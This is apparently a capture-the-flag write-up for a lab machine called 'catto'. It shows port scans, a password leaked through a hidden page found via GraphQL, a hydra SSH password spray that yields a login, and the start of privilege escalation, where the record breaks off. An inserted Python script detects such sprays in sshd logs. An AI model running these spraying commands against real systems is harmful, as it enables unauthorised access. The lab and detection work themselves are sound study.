$ nmap -p- --min-rate 3000 192.168.183.139
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 15:03 +08
Nmap scan report for 192.168.183.139
Host is up (0.17s latency).
Not shown: 65524 closed tcp ports (conn-refused)
PORT STATE SERVICE
2500/tcp filtered rtsserv
4907/tcp filtered unknown
8080/tcp open http-proxy
18080/tcp open unknown
30330/tcp open unknown
36123/tcp open unknown
38439/tcp open unknown
42022/tcp open unknown
42086/tcp filtered unknown
50400/tcp open unknown
56339/tcp filtered unknown
Lots of ports are open, so I ran a detailed service scan against the open ones as well:
$ sudo nmap -p 8080,18080,30330,36123,38439,42022,50400 -sC -sV --min-rate 3000 192.168.183.139
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 15:05 +08
Nmap scan report for 192.168.183.139
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
8080/tcp open http nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Identity by HTML5 UP
|_http-open-proxy: Proxy might be redirecting requests
18080/tcp open http Apache httpd 2.4.37 ((centos))
|_http-title: CentOS \xE6\x8F\x90\xE4\xBE\x9B\xE7\x9A\x84 Apache HTTP \xE6\x9C\x8D\xE5\x8A\xA1\xE5\x99\xA8\xE6\xB5\x8B\xE8\xAF\x95\xE9\xA1\xB5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
30330/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-cors: HEAD GET POST PUT DELETE PATCH
36123/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-cors: HEAD GET POST PUT DELETE PATCH
38439/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, ms-sql-s, oracle-tns:
| HTTP/1.1 400 Bad Request
|_ Connection: close
42022/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 cc2151f2c62aadd6ca0704de705ffa13 (RSA)
| 256 05e490d2002b9d14e39f4468d28ebcdc (ECDSA)
|_ 256 ca804973f0c805aebd2b42371d13e071 (ED25519)
50400/tcp open http Node.js Express framework
|_http-title: Error
|_http-cors: HEAD GET POST PUT DELETE PATCH
Web Enum -> GraphQL
Port 8080 shows a portfolio page:
It was rather static, so I moved to port 30330. This page had some book reviews:
This page looked more dynamic, so I ran a directory scan with feroxbuster, which found nothing of interest. Since the wordlists turned up nothing, I took a look through the site's local files instead:
There were a few interesting folders:
There wasn't much within the folders. On the 'Using Typescript' page, there was a link to documentation:
On the documentation page, there was mention of GraphQL being used, and sure enough /__graphql was a valid directory on the website as per the documentation:
The explorer's left pane already listed some valid queries, so I checked those out. Querying allSitePage reveals every page path on the site, including a hidden one:
Visiting it reveals a password:
This was the password to a Minecraft server. We didn't have a username, but the Minecraft page listed some that we could try:
Minecraft: The Island by Max Brooks, #1 New York Times bestselling author of World War Z, is the first official Minecraft novel. In the tradition of iconic stories like Robinson Crusoe and Treasure Island, Minecraft: The Island will tell the story of a new hero stranded in the world of Minecraft, who must survive the harsh, unfamiliar environment and unravel the secrets of the island.
We loved this book so much that created a server. Already invited and added keralis, xisuma, zombiecleo, mumbojumbo, and waiting for a reply on the entire hermicraft clan. There is a limit on the server, but at least sabel, yvette, zahara, sybilla, marcus, tabbatha and tabby are already online and building.
Good luck everybody!
We can gather all the usernames into one wordlist:
$ hydra -L users -p WallAskCharacter305 192.168.183.139 ssh -s 42022
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-12 15:20:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 11 tasks per 1 server, overall 11 tasks, 11 login tries (l:11/p:1), ~1 try per task
[DATA] attacking ssh://192.168.183.139:42022/
[42022][ssh] host: 192.168.183.139 login: marcus password: WallAskCharacter305
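As an added defender-side example (not part of the writeup), the spray above leaves a recognisable trace in sshd's auth log: one source failing against many distinct usernames within seconds, then an Accepted line. This Python parses constructed syslog-style sshd lines modelled on that burst and flags the pattern; the source IPs, PIDs and ports are made up, and the year is assumed because syslog timestamps omit it.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd log lines modelled on the spray above: one password
# tried against many usernames from one source in a burst. Hostname "catto" and
# the usernames come from the writeup; IPs, PIDs and ports are made up.
SAMPLE_LOG = """\
Jul 12 15:20:55 catto sshd[2101]: Failed password for invalid user keralis from 192.168.183.128 port 51230 ssh2
Jul 12 15:20:55 catto sshd[2102]: Failed password for invalid user xisuma from 192.168.183.128 port 51231 ssh2
Jul 12 15:20:55 catto sshd[2103]: Failed password for invalid user zombiecleo from 192.168.183.128 port 51232 ssh2
Jul 12 15:20:56 catto sshd[2104]: Failed password for invalid user mumbojumbo from 192.168.183.128 port 51233 ssh2
Jul 12 15:20:56 catto sshd[2105]: Failed password for invalid user sabel from 192.168.183.128 port 51234 ssh2
Jul 12 15:20:56 catto sshd[2106]: Failed password for invalid user yvette from 192.168.183.128 port 51235 ssh2
Jul 12 15:20:56 catto sshd[2107]: Accepted password for marcus from 192.168.183.128 port 51236 ssh2
Jul 12 15:30:01 catto sshd[2200]: Failed password for marcus from 10.0.0.7 port 40001 ssh2
Jul 12 15:30:09 catto sshd[2201]: Accepted password for marcus from 10.0.0.7 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)

def parse(lines, year="2023"):
    """Yield (timestamp, result, user, ip) for each recognised sshd auth line.
    The year is an assumption: syslog timestamps do not carry one."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]

def detect_spray(lines, min_users=5, window_s=60):
    """Return {ip: sorted usernames} for sources whose failures hit at least
    min_users distinct accounts within window_s seconds. This is the low-and-wide
    spray pattern (one password, many users), which per-account lockout misses."""
    failures = defaultdict(list)
    for ts, result, user, ip in parse(lines):
        if result == "Failed":
            failures[ip].append((ts, user))
    hits = {}
    for ip, events in failures.items():
        events.sort()
        flagged = set()
        for i, (ts, _) in enumerate(events):
            # distinct users failed in the window ending at this event
            users = {u for t, u in events[: i + 1] if (ts - t).total_seconds() <= window_s}
            if len(users) >= min_users:
                flagged |= users
        if flagged:
            hits[ip] = sorted(flagged)
    return hits

def successes_after_spray(lines, sprays):
    """Accounts that a spraying source then logged into: reset these first."""
    return sorted({(ip, u) for _, r, u, ip in parse(lines) if r == "Accepted" and ip in sprays})
```

The 10.0.0.7 entries are a control: a single failed attempt by a legitimate user must not trip the rule.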
We can then ssh in as marcus:
Privilege Escalation
.bash -> Base64key Root Creds
There was a weird folder .bash within the user's home directory:
[marcus@catto ~]$ ls -la
total 20
drwx------ 5 marcus marcus 167 Nov 25 2020 .
drwxr-xr-x. 3 root root 20 Nov 25 2020 ..
-rw-r--r-- 1 root root 29 Nov 25 2020 .bash
-rw------- 1 marcus marcus 0 Apr 14 2021 .bash_history
-rw-r--r-- 1 marcus marcus 18 Nov 8 2019 .bash_logout
-rw-r--r-- 1 marcus marcus 141 Nov 8 2019 .bash_profile
-rw-r--r-- 1 marcus marcus 312 Nov 8 2019 .bashrc
drwx------ 4 marcus marcus 39 Nov 25 2020 .config
drwxr-xr-x 6 marcus marcus 328 Nov 25 2020 gatsby-blog-starter
-rw------- 1 marcus marcus 33 Jul 12 06:59 local.txt
drwxrwxr-x 4 marcus marcus 69 Nov 25 2020 .npm
[marcus@catto ~]$ cat .bash
F2jJDWaNin8pdk93RLzkdOTr60==
This string looked like base64, but it wasn't. I looked for other binaries with base as part of their name:
[marcus@catto ~]$ base
base32 base64 base64key basename
base64key required a private key to decrypt, so I just tried the user's password, and it worked: